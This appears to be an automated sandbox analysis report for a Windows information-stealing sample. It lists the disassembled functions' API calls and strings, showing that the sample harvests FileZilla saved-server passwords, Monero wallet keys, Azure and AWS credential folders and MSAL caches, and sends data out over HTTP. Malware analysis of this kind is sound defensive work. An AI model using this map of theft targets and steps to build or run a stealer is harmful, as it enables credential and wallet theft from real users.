                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                      Function 00470250 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004699EC
                        • Part of subcall function 004699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00469A11
                        • Part of subcall function 004699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00469A31
                        • Part of subcall function 004699C0: ReadFile.KERNEL32(000000FF,?,00000000,0046148F,00000000), ref: 00469A5A
                        • Part of subcall function 004699C0: LocalFree.KERNEL32(0046148F), ref: 00469A90
                        • Part of subcall function 004699C0: CloseHandle.KERNEL32(000000FF), ref: 00469A9A
                        • Part of subcall function 00478E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00478E52
                      • GetProcessHeap.KERNEL32(00000000,000F423F,00480DBA,00480DB7,00480DB6,00480DB3), ref: 00470362
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00470369
                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00470385
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470393
                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 004703CF
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 004703DD
                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00470419
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470427
                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00470463
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470475
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470502
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 0047051A
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 00470532
                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 0047054A
                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00470562
                      • lstrcat.KERNEL32(?,profile: null), ref: 00470571
                      • lstrcat.KERNEL32(?,url: ), ref: 00470580
                      • lstrcat.KERNEL32(?,00000000), ref: 00470593
                      • lstrcat.KERNEL32(?,00481678), ref: 004705A2
                      • lstrcat.KERNEL32(?,00000000), ref: 004705B5
                      • lstrcat.KERNEL32(?,0048167C), ref: 004705C4
                      • lstrcat.KERNEL32(?,login: ), ref: 004705D3
                      • lstrcat.KERNEL32(?,00000000), ref: 004705E6
                      • lstrcat.KERNEL32(?,00481688), ref: 004705F5
                      • lstrcat.KERNEL32(?,password: ), ref: 00470604
                      • lstrcat.KERNEL32(?,00000000), ref: 00470617
                      • lstrcat.KERNEL32(?,00481698), ref: 00470626
                      • lstrcat.KERNEL32(?,0048169C), ref: 00470635
                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00480DB2), ref: 0047068E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                      • API String ID: 1942843190-555421843
                      • Opcode ID: d5403a31484e6a96d63738ed1dd4060431219fe0a8cd76aa5a7df71d49300638
                      • Instruction ID: 45d7dd7d24f1fafcc32acfad96209c342d0ea9bc66092620dab54c48756bddf2
                      • Opcode Fuzzy Hash: d5403a31484e6a96d63738ed1dd4060431219fe0a8cd76aa5a7df71d49300638
                      • Instruction Fuzzy Hash: 5CD14171900108ABCB04FBF5DD96EEE7379AF54304F54841EF106B6091EF78AA16CB6A
                      Function 00465960 Relevance: 42.5, APIs: 17, Strings: 7, Instructions: 495networkstringmemoryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                        • Part of subcall function 004647B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00464839
                        • Part of subcall function 004647B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00464849
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004659F8
                      • StrCmpCA.SHLWAPI(?,00E8E2F0), ref: 00465A13
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00465B93
                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00E8E260,00000000,?,00E89F78,00000000,?,00481A1C), ref: 00465E71
                      • lstrlen.KERNEL32(00000000), ref: 00465E82
                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00465E93
                      • RtlAllocateHeap.NTDLL(00000000), ref: 00465E9A
                      • lstrlen.KERNEL32(00000000), ref: 00465EAF
                      • lstrlen.KERNEL32(00000000), ref: 00465ED8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00465EF1
                      • lstrlen.KERNEL32(00000000,?,?), ref: 00465F1B
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00465F2F
                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00465F4C
                      • InternetCloseHandle.WININET(00000000), ref: 00465FB0
                      • InternetCloseHandle.WININET(00000000), ref: 00465FBD
                      • HttpOpenRequestA.WININET(00000000,00E8E270,?,00E8DCF8,00000000,00000000,00400100,00000000), ref: 00465BF8
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • InternetCloseHandle.WININET(00000000), ref: 00465FC7
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                      • String ID: "$"$------$------$------$`$p
                      • API String ID: 874700897-3415936598
                      • Opcode ID: f7f5dbd531b0b1a544b91979e3a0057ad1d94dabefd445700e4bfeeb105d7226
                      • Instruction ID: 51cd60e2f3e6057880fc6f04db6b1a72f31afdea08cce2fb3c169fd9932a7b17
                      • Opcode Fuzzy Hash: f7f5dbd531b0b1a544b91979e3a0057ad1d94dabefd445700e4bfeeb105d7226
                      • Instruction Fuzzy Hash: 391243B1820118ABCB14FBA1DC95FEE7378BF54704F10855EF10A62091EF786A59CF6A
                      Function 0046CEF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 00478B60: GetSystemTime.KERNEL32(00480E1A,00E89FA8,004805AE,?,?,004613F9,?,0000001A,00480E1A,00000000,?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 00478B86
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0046CF83
                      • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0046D0C7
                      • RtlAllocateHeap.NTDLL(00000000), ref: 0046D0CE
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D208
                      • lstrcat.KERNEL32(?,00481478), ref: 0046D217
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D22A
                      • lstrcat.KERNEL32(?,0048147C), ref: 0046D239
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D24C
                      • lstrcat.KERNEL32(?,00481480), ref: 0046D25B
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D26E
                      • lstrcat.KERNEL32(?,00481484), ref: 0046D27D
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D290
                      • lstrcat.KERNEL32(?,00481488), ref: 0046D29F
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D2B2
                      • lstrcat.KERNEL32(?,0048148C), ref: 0046D2C1
                      • lstrcat.KERNEL32(?,00000000), ref: 0046D2D4
                      • lstrcat.KERNEL32(?,00481490), ref: 0046D2E3
                        • Part of subcall function 0047A820: lstrlen.KERNEL32(00464F05,?,?,00464F05,00480DDE), ref: 0047A82B
                        • Part of subcall function 0047A820: lstrcpy.KERNEL32(00480DDE,00000000), ref: 0047A885
                      • lstrlen.KERNEL32(?), ref: 0046D32A
                      • lstrlen.KERNEL32(?), ref: 0046D339
                        • Part of subcall function 0047AA70: StrCmpCA.SHLWAPI(00E88B30,0046A7A7,?,0046A7A7,00E88B30), ref: 0047AA8F
                      • DeleteFileA.KERNEL32(00000000), ref: 0046D3B4
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                      • String ID:
                      • API String ID: 1956182324-0
                      • Opcode ID: ac0780cd199e06d85c3ca92aa1f5c967d4045287c9db4d393dee95f07db265bf
                      • Instruction ID: 5dd28875c5e3dcb2a1f255f6bf5ca84dbeeba528b83ac8cac0bb87583a7504c2
                      • Opcode Fuzzy Hash: ac0780cd199e06d85c3ca92aa1f5c967d4045287c9db4d393dee95f07db265bf
                      • Instruction Fuzzy Hash: ABE13071910108ABCB04FBA1DD96EEE7379AF54305F10855AF10AA6091DF38BE16CF6B
                      Function 0046C990 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                        • Part of subcall function 0047A920: lstrcpy.KERNEL32(00000000,?), ref: 0047A972
                        • Part of subcall function 0047A920: lstrcat.KERNEL32(00000000), ref: 0047A982
                        • Part of subcall function 0047A8A0: lstrcpy.KERNEL32(?,00480E17), ref: 0047A905
                        • Part of subcall function 0047A9B0: lstrlen.KERNEL32(?,00E888E0,?,\Monero\wallet.keys,00480E17), ref: 0047A9C5
                        • Part of subcall function 0047A9B0: lstrcpy.KERNEL32(00000000), ref: 0047AA04
                        • Part of subcall function 0047A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0047AA12
                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00E8C928,00000000,?,0048144C,00000000,?,?), ref: 0046CA6C
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0046CA89
                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0046CA95
                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0046CAA8
                      • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0046CAD9
                      • StrStrA.SHLWAPI(?,00E8CAD8,00480B52), ref: 0046CAF7
                      • StrStrA.SHLWAPI(00000000,00E8C970), ref: 0046CB1E
                      • StrStrA.SHLWAPI(?,00E8D3D8,00000000,?,00481458,00000000,?,00000000,00000000,?,00E88A70,00000000,?,00481454,00000000,?), ref: 0046CCA2
                      • StrStrA.SHLWAPI(00000000,00E8D098), ref: 0046CCB9
                        • Part of subcall function 0046C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0046C871
                        • Part of subcall function 0046C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0046C87C
                      • StrStrA.SHLWAPI(?,00E8D098,00000000,?,0048145C,00000000,?,00000000,00E88AA0), ref: 0046CD5A
                      • StrStrA.SHLWAPI(00000000,00E88940), ref: 0046CD71
                        • Part of subcall function 0046C820: lstrcat.KERNEL32(?,00480B46), ref: 0046C943
                        • Part of subcall function 0046C820: lstrcat.KERNEL32(?,00480B47), ref: 0046C957
                        • Part of subcall function 0046C820: lstrcat.KERNEL32(?,00480B4E), ref: 0046C978
                      • lstrlen.KERNEL32(00000000), ref: 0046CE44
                      • CloseHandle.KERNEL32(00000000), ref: 0046CE9C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                      • String ID:
                      • API String ID: 3744635739-3916222277
                      • Opcode ID: b9631f06619d797fec6ab2edc97b561ecda5c87310a0377a757f24b1999f7c85
                      • Instruction ID: 57b0922e0cec47808873e066310923f5befa6f330f967e082f46e7d229769f42
                      • Opcode Fuzzy Hash: b9631f06619d797fec6ab2edc97b561ecda5c87310a0377a757f24b1999f7c85
                      • Instruction Fuzzy Hash: 36E114B1800108ABDB14FBA1DC91FEEB779AF54304F00855EF11A67191DF386A5ACF6A
                      Function 00478320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 0047A740: lstrcpy.KERNEL32(00480E17,00000000), ref: 0047A788
                      • RegOpenKeyExA.ADVAPI32(00000000,00E8AD40,00000000,00020019,00000000,004805B6), ref: 004783A4
                      • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00478426
                      • wsprintfA.USER32 ref: 00478459
                      • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0047847B
                      • RegCloseKey.ADVAPI32(00000000), ref: 0047848C
                      • RegCloseKey.ADVAPI32(00000000), ref: 00478499
                        • Part of subcall function 0047A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0047A7E6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CloseOpenlstrcpy$Enumwsprintf
                      • String ID: - $%s\%s$?
                      • API String ID: 3246050789-3278919252
                      • Opcode ID: 3911c0d336b22c3572624e340a1a6666133e89d5fcb503a6b312c3c86f9b2193
                      • Instruction ID: ef246e027e8e8f97fdc799b347b6e83ab249c15b122dc4648143332cb1ef6419
                      • Opcode Fuzzy Hash: 3911c0d336b22c3572624e340a1a6666133e89d5fcb503a6b312c3c86f9b2193
                      • Instruction Fuzzy Hash: 928140B1910118ABDB24EB54CC85FEE77B9BF48704F00C6DAE109A6140DF756B89CFA5
                      Function 00474D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON
                      Download Yara Rule
                      APIs
                        • Part of subcall function 00478DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00478E0B
                      • lstrcat.KERNEL32(?,00000000), ref: 00474DB0
                      • lstrcat.KERNEL32(?,\.azure\), ref: 00474DCD
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 0047492C
                        • Part of subcall function 00474910: FindFirstFileA.KERNEL32(?,?), ref: 00474943
                      • lstrcat.KERNEL32(?,00000000), ref: 00474E3C
                      • lstrcat.KERNEL32(?,\.aws\), ref: 00474E59
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FDC), ref: 00474971
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,00480FE0), ref: 00474987
                        • Part of subcall function 00474910: FindNextFileA.KERNEL32(000000FF,?), ref: 00474B7D
                        • Part of subcall function 00474910: FindClose.KERNEL32(000000FF), ref: 00474B92
                      • lstrcat.KERNEL32(?,00000000), ref: 00474EC8
                      • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00474EE5
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 004749B0
                        • Part of subcall function 00474910: StrCmpCA.SHLWAPI(?,004808D2), ref: 004749C5
                        • Part of subcall function 00474910: wsprintfA.USER32 ref: 004749E2
                        • Part of subcall function 00474910: PathMatchSpecA.SHLWAPI(?,?), ref: 00474A1E
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,00E8E230), ref: 00474A4A
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,00480FF8), ref: 00474A5C
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,?), ref: 00474A70
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,00480FFC), ref: 00474A82
                        • Part of subcall function 00474910: lstrcat.KERNEL32(?,?), ref: 00474A96
                        • Part of subcall function 00474910: CopyFileA.KERNEL32(?,?,00000001), ref: 00474AAC
                        • Part of subcall function 00474910: DeleteFileA.KERNEL32(?), ref: 00474B31
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.2093692099.0000000000461000.00000040.00000001.01000000.00000003.sdmp, Offset: 00460000, based on PE: true
                      • Associated: 00000000.00000002.2093666310.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.000000000051D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.0000000000542000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093692099.00000000006AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.00000000006BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000844000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000919000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.000000000093D000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000947000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2093869765.0000000000954000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094139101.0000000000955000.00000080.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094265173.0000000000AE6000.00000040.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.2094283446.0000000000AE7000.00000080.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_460000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                      • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                      • API String ID: 949356159-974132213
                      • Opcode ID: ec4fbc30593c54f150bb90d0010af6d879f40ff1f7dc842cb0a5ffeccce92feb
                      • Instruction ID: 1c988d9fff92735ba6d22ff05380123f458901efb71f526e30406b521f979da4
                      • Opcode Fuzzy Hash: ec4fbc30593c54f150bb90d0010af6d879f40ff1f7dc842cb0a5ffeccce92feb
                      • Instruction Fuzzy Hash: 394173BA94020466C754F770DC47FED7238AB65704F00895AB689660C1EEBC5BC9CB96
